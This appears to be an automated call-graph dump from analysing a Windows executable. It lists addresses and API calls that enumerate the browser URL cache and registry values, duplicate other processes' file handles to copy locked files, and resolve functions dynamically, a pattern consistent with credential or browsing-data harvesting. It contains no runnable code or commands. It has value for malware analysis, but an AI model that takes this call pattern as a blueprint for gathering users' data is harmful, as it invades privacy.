38961->38978 38962 40afcf 2 API calls 38963 40c2fd FindFirstUrlCacheEntryW 38962->38963 38964 40c3b6 38963->38964 38965 40c31e wcschr 38963->38965 38966 40b04b ??3@YAXPAX 38964->38966 38967 40c331 38965->38967 38968 40c35e FindNextUrlCacheEntryW 38965->38968 38966->38961 38969 40a8ab 9 API calls 38967->38969 38968->38965 38970 40c373 GetLastError 38968->38970 38973 40c33e wcschr 38969->38973 38971 40c3ad FindCloseUrlCache 38970->38971 38972 40c37e 38970->38972 38971->38964 38974 40afcf 2 API calls 38972->38974 38973->38968 38975 40c34f 38973->38975 38976 40c391 FindNextUrlCacheEntryW 38974->38976 38977 40a8ab 9 API calls 38975->38977 38976->38965 38976->38971 38977->38968 39142 40a97a 38978->39142 38981 40a8cc 38981->38568 38982 40a8d0 7 API calls 38982->38981 39147 40b1ab ??3@YAXPAX ??3@YAXPAX 38983->39147 38985 40c3dd 38986 40b2cc 27 API calls 38985->38986 38987 40c3e7 38986->38987 39148 414592 RegOpenKeyExW 38987->39148 38989 40c3f4 38990 40c50e 38989->38990 38991 40c3ff 38989->38991 39005 405337 38990->39005 38992 40a9ce 4 API calls 38991->38992 38993 40c418 memset 38992->38993 39149 40aa1d 38993->39149 38996 40c471 38998 40c47a _wcsupr 38996->38998 38997 40c505 RegCloseKey 38997->38990 38999 40a8d0 7 API calls 38998->38999 39000 40c498 38999->39000 39001 40a8d0 7 API calls 39000->39001 39002 40c4ac memset 39001->39002 39003 40aa1d 39002->39003 39004 40c4e4 RegEnumValueW 39003->39004 39004->38997 39004->38998 39151 405220 39005->39151 39009 4099c6 2 API calls 39008->39009 39010 40a714 _wcslwr 39009->39010 39011 40c634 39010->39011 39208 405361 39011->39208 39014 40c65c wcslen 39211 4053b6 39 API calls 39014->39211 39015 40c71d wcslen 39015->38575 39017 40c677 39018 40c713 39017->39018 39212 40538b 39 API calls 39017->39212 39214 4053df 39 API calls 39018->39214 39021 40c6a5 39021->39018 39022 40c6a9 memset 39021->39022 39023 40c6d3 39022->39023 39213 40c589 43 API calls 39023->39213 39025->38576 39027 40ae18 9 API calls 39026->39027 39033 40c210 39027->39033 39028 40ae51 9 API calls 39028->39033 39029 40c264 39030 40aebe FindClose 39029->39030 39032 40c26f 39030->39032 39031 40add4 2 API calls 39031->39033 39038 40e5ed memset memset 39032->39038 39033->39028 39033->39029 39033->39031 39034 40c231 _wcsicmp 39033->39034 39035 40c1d3 35 API calls 39033->39035 39034->39033 39036 40c248 39034->39036 39035->39033 39051 40c084 22 API calls 39036->39051 39039 414c2e 16 API calls 39038->39039 39040 40e63f 39039->39040 39041 409d1f 6 API calls 39040->39041 39042 40e658 39041->39042 39052 409b98 GetFileAttributesW 39042->39052 39044 40e667 39046 409d1f 6 API calls 39044->39046 39047 40e680 39044->39047 39046->39047 39053 409b98 GetFileAttributesW 39047->39053 39048 40e68f 39049 40c2d8 39048->39049 39054 40e4b2 39048->39054 39049->38961 39049->38962 39051->39033 39052->39044 39053->39048 39075 40e01e 39054->39075 39056 40e593 39057 40e5b0 39056->39057 39058 40e59c DeleteFileW 39056->39058 39059 40b04b ??3@YAXPAX 39057->39059 39058->39057 39061 40e5bb 39059->39061 39060 40e521 39060->39056 39098 40e175 39060->39098 39063 40e5c4 CloseHandle 39061->39063 39064 40e5cc 39061->39064 39063->39064 39066 40b633 ??3@YAXPAX 39064->39066 39065 40e573 39067 40e584 39065->39067 39068 40e57c FindCloseChangeNotification 39065->39068 39069 40e5db 39066->39069 39141 40b1ab ??3@YAXPAX ??3@YAXPAX 39067->39141 39068->39067 39072 40b633 ??3@YAXPAX 39069->39072 39071 40e540 39071->39065 39118 40e2ab 39071->39118 39073 40e5e3 39072->39073 39073->39049 39076 406214 22 API calls 39075->39076 39077 40e03c 39076->39077 39078 40e16b 39077->39078 39079 40dd85 74 API calls 39077->39079 39078->39060 39080 40e06b 39079->39080 39080->39078 39081 40afcf ??2@YAPAXI ??3@YAXPAX 39080->39081 39082 40e08d OpenProcess 39081->39082 39083 40e0a4 GetCurrentProcess DuplicateHandle 39082->39083 39087 40e152 39082->39087 39084 40e0d0 GetFileSize 39083->39084 39085 40e14a CloseHandle 39083->39085 39088 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39084->39088 39085->39087 39086 40e160 39090 40b04b ??3@YAXPAX 39086->39090 39087->39086 39089 406214 22 API calls 39087->39089 39091 40e0ea 39088->39091 39089->39086 39090->39078 39092 4096dc CreateFileW 39091->39092 39093 40e0f1 CreateFileMappingW 39092->39093 39094 40e140 CloseHandle CloseHandle 39093->39094 39095 40e10b MapViewOfFile 39093->39095 39094->39085 39096 40e13b FindCloseChangeNotification 39095->39096 39097 40e11f WriteFile UnmapViewOfFile 39095->39097 39096->39094 39097->39096 39099 40e18c 39098->39099 39100 406b90 11 API calls 39099->39100 39101 40e19f 39100->39101 39102 40e1a7 memset 39101->39102 39103 40e299 39101->39103 39109 40e1e8 39102->39109 39104 4069a3 ??3@YAXPAX ??3@YAXPAX 39103->39104 39105 40e2a4 39104->39105 39105->39071 39106 406e8f 13 API calls 39106->39109 39107 406b53 SetFilePointerEx ReadFile 39107->39109 39108 40dd50 _wcsicmp 39108->39109 39109->39106 39109->39107 39109->39108 39110 40e283 39109->39110 39114 40742e 8 API calls 39109->39114 39115 40aae3 wcslen wcslen _memicmp 39109->39115 39116 40e244 _snwprintf 39109->39116 39111 40e291 39110->39111 39112 40e288 ??3@YAXPAX 39110->39112 39113 40aa04 ??3@YAXPAX 39111->39113 39112->39111 39113->39103 39114->39109 39115->39109 39117 40a8d0 7 API calls 39116->39117 39117->39109 39119 40e2c2 39118->39119 39120 406b90 11 API calls 39119->39120 39131 40e2d3 39120->39131 39121 40e4a0 39122 4069a3 ??3@YAXPAX ??3@YAXPAX 39121->39122 39124 40e4ab 39122->39124 39123 406e8f 13 API calls 39123->39131 39124->39071 39125 406b53 SetFilePointerEx ReadFile 39125->39131 39126 40e489 39127 40aa04 ??3@YAXPAX 39126->39127 39129 40e491 39127->39129 39128 40dd50 _wcsicmp 39128->39131 39129->39121 39130 40e497 ??3@YAXPAX 39129->39130 39130->39121 39131->39121 39131->39123 39131->39125 39131->39126 39131->39128 39132 40dd50 _wcsicmp 39131->39132 39135 40742e 8 API calls 39131->39135 39136 40e3e0 memcpy 39131->39136 39137 40e3b3 wcschr 39131->39137 39138 40e3fb memcpy 39131->39138 39139 40e416 memcpy 39131->39139 39140 40e431 memcpy 39131->39140 39133 40e376 memset 39132->39133 39134 40aa29 6 API calls 39133->39134 39134->39131 39135->39131 39136->39131 39137->39131 39138->39131 39139->39131 39140->39131 39141->39056 39144 40a980 39142->39144 39143 40a8bb 39143->38981 39143->38982 39144->39143 39145 40a995 _wcsicmp 39144->39145 39146 40a99c wcscmp 39144->39146 39145->39144 39146->39144 39147->38985 39148->38989 39150 40aa23 RegEnumValueW 39149->39150 39150->38996 39150->38997 39152 405335 39151->39152 39153 40522a 39151->39153 39152->38575 39154 40b2cc 27 API calls 39153->39154 39155 405234 39154->39155 39156 40a804 8 API calls 39155->39156 39157 40523a 39156->39157 39196 40b273 39157->39196 39159 405248 _mbscpy _mbscat GetProcAddress 39160 40b273 27 API calls 39159->39160 39161 405279 39160->39161 39199 405211 GetProcAddress 39161->39199 39163 405282 39164 40b273 27 API calls 39163->39164 39165 40528f 39164->39165 39200 405211 GetProcAddress 39165->39200 39167 405298 39168 40b273 27 API calls 39167->39168 39169 4052a5 39168->39169 39201 405211 GetProcAddress 39169->39201 39171 4052ae 39172 40b273 27 API calls 39171->39172 39173 4052bb 39172->39173 39202 405211 GetProcAddress 39173->39202 39175 4052c4 39176 40b273 27 API calls 39175->39176 39177 4052d1 39176->39177 39203 405211 GetProcAddress 39177->39203 39179 4052da 39180 40b273 27 API calls 39179->39180 39181 4052e7 39180->39181 39204 405211 GetProcAddress 39181->39204 39183 4052f0 39184 40b273 27 API calls 39183->39184 39185 4052fd 39184->39185 39205 405211 GetProcAddress 39185->39205 39187 405306 39188 40b273 27 API calls 39187->39188 39189 405313 39188->39189 39206 405211 GetProcAddress 39189->39206 39191 40531c 39192 40b273 27 API calls 39191->39192 39193 405329 39192->39193 39207 405211 GetProcAddress 39193->39207 39195 405332 39195->39152 39197 40b58d 27 API calls 39196->39197 39198 40b18c 39197->39198 39198->39159 39199->39163 39200->39167 39201->39171 39202->39175 39203->39179 39204->39183 39205->39187 39206->39191 39207->39195 39209 405220 39 API calls 39208->39209 39210 405369 39209->39210 39210->39014 39210->39015 39211->39017 39212->39021 39213->39018 39214->39015 39216 40440c FreeLibrary 39215->39216 39217 40436d 39216->39217 39218 40a804 8 API calls 39217->39218 39219 404377 39218->39219 39220 404383 39219->39220 39221 404405 39219->39221 39222 40b273 27 API calls 39220->39222 39221->38587 39221->38589 39221->38590 39223 40438d GetProcAddress 39222->39223 39224 40b273 27 API calls 39223->39224 39225 4043a7 GetProcAddress 39224->39225 39226 40b273 27 API calls 39225->39226 39227 4043ba GetProcAddress 39226->39227 39228 40b273 27 API calls 39227->39228 39229 4043ce GetProcAddress 39228->39229 39230 40b273 27 API calls 39229->39230 39231 4043e2 GetProcAddress 39230->39231 39232 4043f1 39231->39232 39233 4043f7 39232->39233 39234 40440c FreeLibrary 39232->39234 39233->39221 39234->39221 39236 404413 FreeLibrary 39235->39236 39237 40441e 39235->39237 39236->39237 39237->38604 39238->38600 39240 40447e 39239->39240 39241 40442e 39239->39241 39240->38600 39242 40b2cc 27 API calls 39241->39242 39243 404438 39242->39243 39244 40a804 8 API calls 39243->39244 39245 40443e 39244->39245 39246 404445 39245->39246 39247 404467 39245->39247 39248 40b273 27 API calls 39246->39248 39247->39240 39249 404475 FreeLibrary 39247->39249 39250 40444f GetProcAddress 39248->39250 39249->39240 39250->39247 39251 404460 39250->39251 39251->39247 39253 4135f6 39252->39253 39254 4135eb FreeLibrary 39252->39254 39253->38607 39254->39253 39256 4449c4 39255->39256 39257 444a52 39255->39257 39258 40b2cc 27 API calls 39256->39258 39257->38624 39257->38625 39259 4449cb 39258->39259 39260 40a804 8 API calls 39259->39260 39261 4449d1 39260->39261 39262 40b273 27 API calls 39261->39262 39263 4449dc GetProcAddress 39262->39263 39264 40b273 27 API calls 39263->39264 39265 4449f3 GetProcAddress 39264->39265 39266 40b273 27 API calls 39265->39266 39267 444a04 GetProcAddress 39266->39267 39268 40b273 27 API calls 39267->39268 39269 444a15 GetProcAddress 39268->39269 39270 40b273 27 API calls 39269->39270 39271 444a26 GetProcAddress 39270->39271 39272 40b273 27 API calls 39271->39272 39273 444a37 GetProcAddress 39272->39273 39274 40b273 27 API calls 39273->39274 39275 444a48 GetProcAddress 39274->39275 39275->39257 39276->38635 39277->38635 39278->38635 39279->38635 39280->38626 39282 403a29 39281->39282 39296 403bed memset memset 39282->39296 39284 403ae7 39309 40b1ab ??3@YAXPAX ??3@YAXPAX 39284->39309 39285 403a3f memset 39290 403a2f 39285->39290 39287 403aef 39287->38643 39288 409d1f 6 API calls 39288->39290 39289 409b98 GetFileAttributesW 39289->39290 39290->39284 39290->39285 39290->39288 39290->39289 39291 40a8d0 7 API calls 39290->39291 39291->39290 39293 40a051 GetFileTime FindCloseChangeNotification 39292->39293 39294 4039ca CompareFileTime 39292->39294 39293->39294 39294->38643 39295->38642 39297 414c2e 16 API calls 39296->39297 39298 403c38 39297->39298 39299 409719 2 API calls 39298->39299 39300 403c3f wcscat 39299->39300 39301 414c2e 16 API calls 39300->39301 39302 403c61 39301->39302 39303 409719 2 API calls 39302->39303 39304 403c68 wcscat 39303->39304 39310 403af5 39304->39310 39307 403af5 20 API calls 39308 403c95 39307->39308 39308->39290 39309->39287 39311 403b02 39310->39311 39312 40ae18 9 API calls 39311->39312 39320 403b37 39312->39320 39313 403bdb 39315 40aebe FindClose 39313->39315 39314 40add4 wcscmp wcscmp 39314->39320 39316 403be6 39315->39316 39316->39307 39317 40ae18 9 API calls 39317->39320 39318 40ae51 9 API calls 39318->39320 39319 40aebe FindClose 39319->39320 39320->39313 39320->39314 39320->39317 39320->39318 39320->39319 39321 40a8d0 7 API calls 39320->39321 39321->39320 39323 409d1f 6 API calls 39322->39323 39324 404190 39323->39324 39337 409b98 GetFileAttributesW 39324->39337 39326 40419c 39327 4041a7 6 API calls 39326->39327 39328 40435c 39326->39328 39329 40424f 39327->39329 39328->38669 39329->39328 39331 40425e memset 39329->39331 39333 409d1f 6 API calls 39329->39333 39334 40a8ab 9 API calls 39329->39334 39338 414842 39329->39338 39331->39329 39332 404296 wcscpy 39331->39332 39332->39329 39333->39329 39335 4042b6 memset memset _snwprintf wcscpy 39334->39335 39335->39329 39336->38667 39337->39326 39341 41443e 39338->39341 39340 414866 39340->39329 39342 41444b 39341->39342 39343 414451 39342->39343 39344 4144a3 GetPrivateProfileStringW 39342->39344 39345 414491 39343->39345 39346 414455 wcschr 39343->39346 39344->39340 39347 414495 WritePrivateProfileStringW 39345->39347 39346->39345 39348 414463 _snwprintf 39346->39348 39347->39340 39348->39347 39349->38673 39351 40b2cc 27 API calls 39350->39351 39352 409615 39351->39352 39353 409d1f 6 API calls 39352->39353 39354 409625 39353->39354 39379 409b98 GetFileAttributesW 39354->39379 39356 409634 39357 409648 39356->39357 39380 4091b8 memset 39356->39380 39359 40b2cc 27 API calls 39357->39359 39361 408801 39357->39361 39360 40965d 39359->39360 39362 409d1f 6 API calls 39360->39362 39361->38676 39361->38677 39363 40966d 39362->39363 39432 409b98 GetFileAttributesW 39363->39432 39365 40967c 39365->39361 39366 409681 39365->39366 39433 409529 72 API calls 39366->39433 39368 409690 39368->39361 39369->38699 39379->39356 39434 40a6e6 WideCharToMultiByte 39380->39434 39382 409202 39435 444432 39382->39435 39385 40b273 27 API calls 39386 409236 39385->39386 39481 438552 39386->39481 39389 409383 39391 40b273 27 API calls 39389->39391 39392 409399 39391->39392 39395 438552 134 API calls 39392->39395 39413 4093a3 39395->39413 39399 4094ff 39484 443d90 39399->39484 39402 4251c4 137 API calls 39402->39413 39404 409507 39412 40951d 39404->39412 39406 4093df 39537 424f26 123 API calls 39406->39537 39410 4253cf 17 API calls 39410->39413 39412->39357 39413->39399 39413->39402 39413->39406 39413->39410 39415 4093e4 39413->39415 39419 4253af 17 API calls 39415->39419 39422 4093ed 39419->39422 39424 4253af 17 API calls 39422->39424 39432->39365 39433->39368 39434->39382 39436 4438b5 11 API calls 39435->39436 39437 44444c 39436->39437 39443 409215 39437->39443 39539 415a6d 39437->39539 39439 4442e6 11 API calls 39441 44469e 39439->39441 39440 444486 39442 4444b9 memcpy 39440->39442 39480 4444a4 39440->39480 39441->39443 39445 443d90 111 API calls 39441->39445 39543 415258 39442->39543 39443->39385 39443->39412 39445->39443 39446 444524 39447 444541 39446->39447 39448 44452a 39446->39448 39546 444316 39447->39546 39449 416935 16 API calls 39448->39449 39449->39480 39452 444316 18 API calls 39453 444563 39452->39453 39454 444316 18 API calls 39453->39454 39455 44456f 39454->39455 39456 444316 18 API calls 39455->39456 39480->39439 39613 438460 39481->39613 39483 409240 39483->39389 39504 4251c4 39483->39504 39485 443da3 39484->39485 39486 443db6 39484->39486 39625 41707a 39485->39625 39486->39404 39641 424f07 39504->39641 39506 4251e4 39507 4251f7 39506->39507 39508 4251e8 39506->39508 39649 4250f8 39507->39649 39648 4446ea 11 API calls 39508->39648 39510 4251f2 39537->39399 39540 415a77 39539->39540 39541 415a8d 39540->39541 39542 415a7e memset 39540->39542 39541->39440 39542->39541 39544 4438b5 11 API calls 39543->39544 39545 41525d 39544->39545 39545->39446 39547 444328 39546->39547 39548 444423 39547->39548 39549 44434e 39547->39549 39550 4446ea 11 API calls 39548->39550 39551 432d4e memset memset memcpy 39549->39551 39557 444381 39550->39557 39552 44435a 39551->39552 39554 444375 39552->39554 39559 44438b 39552->39559 39553 432d4e memset memset memcpy 39555 4443ec 39553->39555 39556 416935 16 API calls 39554->39556 39555->39557 39558 416935 16 API calls 39555->39558 39556->39557 39557->39452 39558->39557 39559->39553 39614 41703f 11 API calls 39613->39614 39615 43847a 39614->39615 39616 43848a 39615->39616 39617 43847e 39615->39617 39619 438270 134 API calls 39616->39619 39618 4446ea 11 API calls 39617->39618 39621 438488 39618->39621 39620 4384aa 39619->39620 39620->39621 39622 424f26 123 API calls 39620->39622 39621->39483 39623 4384bb 39622->39623 39624 438270 134 API calls 39623->39624 39624->39621 39642 424f1f 39641->39642 39643 424f0c 39641->39643 39645 424eea 11 API calls 39642->39645 39644 416760 11 API calls 39643->39644 39646 424f18 39644->39646 39647 424f24 39645->39647 39646->39506 39647->39506 39648->39510 39650 425108 39649->39650 39656 42510d 39649->39656 39712 413f4f 39685->39712 39688 413f37 K32GetModuleFileNameExW 39689 413f4a 39688->39689 39689->38735 39691 413969 wcscpy 39690->39691 39692 41396c wcschr 39690->39692 39704 413a3a 39691->39704 39692->39691 39694 41398e 39692->39694 39717 4097f7 wcslen wcslen _memicmp 39694->39717 39696 41399a 39697 4139a4 memset 39696->39697 39698 4139e6 39696->39698 39718 409dd5 GetWindowsDirectoryW wcscpy 39697->39718 39700 413a31 wcscpy 39698->39700 39701 4139ec memset 39698->39701 39700->39704 39719 409dd5 GetWindowsDirectoryW wcscpy 39701->39719 39702 4139c9 wcscpy wcscat 39702->39704 39704->38735 39705 413a11 memcpy wcscat 39705->39704 39707 413cb0 GetModuleHandleW 39706->39707 39708 413cda 39706->39708 39707->39708 39709 413cbf GetProcAddress 39707->39709 39710 413ce3 GetProcessTimes 39708->39710 39711 413cf6 39708->39711 39709->39708 39710->38738 39711->38738 39713 413f2f 39712->39713 39714 413f54 39712->39714 39713->39688 39713->39689 39715 40a804 8 API calls 39714->39715 39716 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39715->39716 39716->39713 39717->39696 39718->39702 39719->39705 39720->38759 39721->38782 39723 409cf9 GetVersionExW 39722->39723 39724 409d0a 39722->39724 39723->39724 39724->38788 39724->38792 39725->38794 39726->38797 39727->38799 39728->38864 39730 40bba5 39729->39730 39790 40cc26 39730->39790 39733 40bd4b 39811 40cc0c 39733->39811 39738 40b2cc 27 API calls 39739 40bbef 39738->39739 39818 40ccf0 _wcsicmp 39739->39818 39741 40bbf5 39741->39733 39819 40ccb4 6 API calls 39741->39819 39743 40bc26 39744 40cf04 17 API calls 39743->39744 39745 40bc2e 39744->39745 39746 40bd43 39745->39746 39747 40b2cc 27 API calls 39745->39747 39748 40cc0c 4 API calls 39746->39748 39749 40bc40 39747->39749 39748->39733 39820 40ccf0 _wcsicmp 39749->39820 39751 40bc46 39751->39746 39752 40bc61 memset memset WideCharToMultiByte 39751->39752 39821 40103c strlen 39752->39821 39754 40bcc0 39755 40b273 27 API calls 39754->39755 39756 40bcd0 memcmp 39755->39756 39756->39746 39757 40bce2 39756->39757 39758 404423 37 API calls 39757->39758 39759 40bd10 39758->39759 39759->39746 39760 40bd3a LocalFree 39759->39760 39761 40bd1f memcpy 39759->39761 39760->39746 39761->39760 39762->38879 39764 42533e 16 API calls 39763->39764 39765 42541f 39764->39765 39766 424ff0 13 API calls 39765->39766 39767 425425 39766->39767 39768 42538f 16 API calls 39767->39768 39769 42542d 39768->39769 39769->38916 39771 42533e 16 API calls 39770->39771 39772 4253fb 39771->39772 39773 42538f 16 API calls 39772->39773 39774 42540b 39773->39774 39774->38916 39776 40b65c 39775->39776 39777 40b697 SystemTimeToFileTime 39776->39777 39780 40b681 39776->39780 39881 44d9c0 39777->39881 39779 40b6d6 FileTimeToLocalFileTime 39779->39780 39780->38916 39782 409a74 GetTempFileNameW 39781->39782 39783 409a66 GetWindowsDirectoryW 39781->39783 39782->38878 39783->39782 39784->38916 39785->38916 39786->38916 39787->38916 39788->38891 39789->38913 39822 4096c3 CreateFileW 39790->39822 39792 40cc34 39793 40cc3d GetFileSize 39792->39793 39794 40bbca 39792->39794 39795 40afcf 2 API calls 39793->39795 39794->39733 39802 40cf04 39794->39802 39796 40cc64 39795->39796 39823 40a2ef ReadFile 39796->39823 39798 40cc71 39824 40ab4a MultiByteToWideChar 39798->39824 39800 40cc95 FindCloseChangeNotification 39801 40b04b ??3@YAXPAX 39800->39801 39801->39794 39803 40b633 ??3@YAXPAX 39802->39803 39804 40cf14 39803->39804 39830 40b1ab ??3@YAXPAX ??3@YAXPAX 39804->39830 39806 40bbdd 39806->39733 39806->39738 39807 40cf1b 39807->39806 39809 40cfef 39807->39809 39831 40cd4b 39807->39831 39810 40cd4b 14 API calls 39809->39810 39810->39806 39812 40b633 ??3@YAXPAX 39811->39812 39813 40cc15 39812->39813 39814 40aa04 ??3@YAXPAX 39813->39814 39815 40cc1d 39814->39815 39880 40b1ab ??3@YAXPAX ??3@YAXPAX 39815->39880 39817 40b7d4 memset CreateFileW 39817->38871 39817->38872 39818->39741 39819->39743 39820->39751 39821->39754 39822->39792 39823->39798 39825 40ab6b 39824->39825 39829 40ab93 39824->39829 39826 40a9ce 4 API calls 39825->39826 39827 40ab74 39826->39827 39828 40ab7c MultiByteToWideChar 39827->39828 39828->39829 39829->39800 39830->39807 39832 40cd7b 39831->39832 39865 40aa29 39832->39865 39834 40cef5 39835 40aa04 ??3@YAXPAX 39834->39835 39836 40cefd 39835->39836 39836->39807 39838 40aa29 6 API calls 39839 40ce1d 39838->39839 39840 40aa29 6 API calls 39839->39840 39841 40ce3e 39840->39841 39842 40ce6a 39841->39842 39873 40abb7 wcslen memmove 39841->39873 39843 40ce9f 39842->39843 39876 40abb7 wcslen memmove 39842->39876 39845 40a8d0 7 API calls 39843->39845 39848 40ceb5 39845->39848 39846 40ce56 39874 40aa71 wcslen 39846->39874 39855 40a8d0 7 API calls 39848->39855 39850 40ce8b 39877 40aa71 wcslen 39850->39877 39852 40ce5e 39875 40abb7 wcslen memmove 39852->39875 39853 40ce93 39878 40abb7 wcslen memmove 39853->39878 39857 40cecb 39855->39857 39879 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39857->39879 39859 40cedd 39860 40aa04 ??3@YAXPAX 39859->39860 39861 40cee5 39860->39861 39862 40aa04 ??3@YAXPAX 39861->39862 39863 40ceed 39862->39863 39864 40aa04 ??3@YAXPAX 39863->39864 39864->39834 39866 40aa33 39865->39866 39872 40aa63 39865->39872 39867 40aa44 39866->39867 39868 40aa38 wcslen 39866->39868 39869 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39867->39869 39868->39867 39870 40aa4d 39869->39870 39871 40aa51 memcpy 39870->39871 39870->39872 39871->39872 39872->39834 39872->39838 39873->39846 39874->39852 39875->39842 39876->39850 39877->39853 39878->39843 39879->39859 39880->39817 39881->39779 39882->38932 39883->38940 39893 44def7 39894 44df07 39893->39894 39895 44df00 ??3@YAXPAX 39893->39895 39896 44df17 39894->39896 39897 44df10 ??3@YAXPAX 39894->39897 39895->39894 39898 44df27 39896->39898 39899 44df20 ??3@YAXPAX 39896->39899 39897->39896 39900 44df37 39898->39900 39901 44df30 ??3@YAXPAX 39898->39901 39899->39898 39901->39900 37672 44dea5 37673 44deb5 FreeLibrary 37672->37673 37674 44dec3 37672->37674 37673->37674 39902 40b0b5 ??3@YAXPAX ??3@YAXPAX 39903 4148b6 FindResourceW 39904 4148cf SizeofResource 39903->39904 39907 4148f9 39903->39907 39905 4148e0 LoadResource 39904->39905 39904->39907 39906 4148ee LockResource 39905->39906 39905->39907 39906->39907 39908 441b3f 39918 43a9f6 39908->39918 39910 441b61 40091 4386af memset 39910->40091 39912 44189a 39913 4418e2 39912->39913 39916 442bd4 39912->39916 39914 4418ea 39913->39914 40092 4414a9 12 API calls 39913->40092 39916->39914 40093 441409 memset 39916->40093 39919 43aa20 39918->39919 39920 43aadf 39918->39920 39919->39920 39921 43aa34 memset 39919->39921 39920->39910 39922 43aa56 39921->39922 39923 43aa4d 39921->39923 40094 43a6e7 39922->40094 40102 42c02e memset 39923->40102 39928 43aad3 40104 4169a7 11 API calls 39928->40104 39929 43aaae 39929->39920 39929->39928 39944 43aae5 39929->39944 39930 43ac18 39933 43ac47 39930->39933 40106 42bbd5 memcpy memcpy memcpy memset memcpy 39930->40106 39934 43aca8 39933->39934 40107 438eed 16 API calls 39933->40107 39938 43acd5 39934->39938 40109 4233ae 11 API calls 39934->40109 39937 43ac87 40108 4233c5 16 API calls 39937->40108 40110 423426 11 API calls 39938->40110 39942 43ace1 40111 439811 164 API calls 39942->40111 39943 43a9f6 162 API calls 39943->39944 39944->39920 39944->39930 39944->39943 40105 439bbb 22 API calls 39944->40105 39946 43acfd 39951 43ad2c 39946->39951 40112 438eed 16 API calls 39946->40112 39948 43ad19 40113 4233c5 16 API calls 39948->40113 39950 43ad58 40114 44081d 164 API calls 39950->40114 39951->39950 39954 43add9 39951->39954 40118 423426 11 API calls 39954->40118 39955 43ae3a memset 39956 43ae73 39955->39956 40119 42e1c0 148 API calls 39956->40119 39957 43adab 40116 438c4e 164 API calls 39957->40116 39958 43ad6c 39958->39920 39958->39957 40115 42370b memset memcpy memset 39958->40115 39962 43adcc 40117 440f84 12 API calls 39962->40117 39963 43ae96 40120 42e1c0 148 API calls 39963->40120 39966 43aea8 39967 43aec1 39966->39967 40121 42e199 148 API calls 39966->40121 39968 43af00 39967->39968 40122 42e1c0 148 API calls 39967->40122 39968->39920 39972 43af1a 39968->39972 39973 43b3d9 39968->39973 40123 438eed 16 API calls 39972->40123 39978 43b4c8 39973->39978 39981 43b3f6 39973->39981 39974 43b60f 39974->39920 40182 4393a5 17 API calls 39974->40182 39977 43af2f 40124 4233c5 16 API calls 39977->40124 39983 43b4f2 39978->39983 40170 42bbd5 memcpy memcpy memcpy memset memcpy 39978->40170 39980 43af51 40125 423426 11 API calls 39980->40125 40164 432878 12 API calls 39981->40164 40171 43a76c 21 API calls 39983->40171 39985 43af7d 40126 423426 11 API calls 39985->40126 39989 43b529 40172 44081d 164 API calls 39989->40172 39990 43b462 40166 423330 11 API calls 39990->40166 39991 43af94 40127 423330 11 API calls 39991->40127 39995 43afca 40128 423330 11 API calls 39995->40128 39996 43b47e 40000 43b497 39996->40000 40167 42374a memcpy memset memcpy memcpy memcpy 39996->40167 39997 43b544 40001 43b55c 39997->40001 40173 42c02e memset 39997->40173 39998 43b428 39998->39990 40165 432b60 16 API calls 39998->40165 40168 4233ae 11 API calls 40000->40168 40174 43a87a 164 API calls 40001->40174 40003 43afdb 40129 4233ae 11 API calls 40003->40129 40008 43b56c 40012 43b58a 40008->40012 40175 423330 11 API calls 40008->40175 40009 43b4b1 40169 423399 11 API calls 40009->40169 40011 43afee 40130 44081d 164 API calls 40011->40130 40176 440f84 12 API calls 40012->40176 40013 43b4c1 40178 42db80 164 API calls 40013->40178 40018 43b592 40177 43a82f 16 API calls 40018->40177 40021 43b5b4 40179 438c4e 164 API calls 40021->40179 40023 43b5cf 40180 42c02e memset 40023->40180 40025 43b005 40025->39920 40029 43b01f 40025->40029 40131 42d836 164 API calls 40025->40131 40026 43b1ef 40141 4233c5 16 API calls 40026->40141 40029->40026 40139 423330 11 API calls 40029->40139 40140 42d71d 164 API calls 40029->40140 40030 43b212 40142 423330 11 API calls 40030->40142 40032 43b087 40132 4233ae 11 API calls 40032->40132 40033 43add4 40033->39974 40181 438f86 16 API calls 40033->40181 40036 43b22a 40143 42ccb5 11 API calls 40036->40143 40039 43b23f 40144 4233ae 11 API calls 40039->40144 40040 43b10f 40135 423330 11 API calls 40040->40135 40042 43b257 40145 4233ae 11 API calls 40042->40145 40046 43b129 40136 4233ae 11 API calls 40046->40136 40047 43b26e 40146 4233ae 11 API calls 40047->40146 40050 43b09a 40050->40040 40133 42cc15 19 API calls 40050->40133 40134 4233ae 11 API calls 40050->40134 40051 43b282 40147 43a87a 164 API calls 40051->40147 40053 43b13c 40137 440f84 12 API calls 40053->40137 40055 43b29d 40148 423330 11 API calls 40055->40148 40058 43b15f 40138 4233ae 11 API calls 40058->40138 40059 43b2af 40060 43b2b8 40059->40060 40061 43b2ce 40059->40061 40149 4233ae 11 API calls 40060->40149 40150 440f84 12 API calls 40061->40150 40065 43b2c9 40152 4233ae 11 API calls 40065->40152 40066 43b2da 40151 42370b memset memcpy memset 40066->40151 40069 43b2f9 40153 423330 11 API calls 40069->40153 40071 43b30b 40154 423330 11 API calls 40071->40154 40073 43b325 40155 423399 11 API calls 40073->40155 40075 43b332 40156 4233ae 11 API calls 40075->40156 40077 43b354 40157 423399 11 API calls 40077->40157 40079 43b364 40158 43a82f 16 API calls 40079->40158 40081 43b370 40159 42db80 164 API calls 40081->40159 40083 43b380 40160 438c4e 164 API calls 40083->40160 40085 43b39e 40161 423399 11 API calls 40085->40161 40087 43b3ae 40162 43a76c 21 API calls 40087->40162 40089 43b3c3 40163 423399 11 API calls 40089->40163 40091->39912 40092->39914 40093->39916 40095 43a6f5 40094->40095 40098 43a765 40094->40098 40095->40098 40183 42a115 40095->40183 40098->39920 40103 4397fd memset 40098->40103 40100 43a73d 40100->40098 40101 42a115 148 API calls 40100->40101 40101->40098 40102->39922 40103->39929 40104->39920 40105->39944 40106->39933 40107->39937 40108->39934 40109->39938 40110->39942 40111->39946 40112->39948 40113->39951 40114->39958 40115->39957 40116->39962 40117->40033 40118->39955 40119->39963 40120->39966 40121->39967 40122->39967 40123->39977 40124->39980 40125->39985 40126->39991 40127->39995 40128->40003 40129->40011 40130->40025 40131->40032 40132->40050 40133->40050 40134->40050 40135->40046 40136->40053 40137->40058 40138->40029 40139->40029 40140->40029 40141->40030 40142->40036 40143->40039 40144->40042 40145->40047 40146->40051 40147->40055 40148->40059 40149->40065 40150->40066 40151->40065 40152->40069 40153->40071 40154->40073 40155->40075 40156->40077 40157->40079 40158->40081 40159->40083 40160->40085 40161->40087 40162->40089 40163->40033 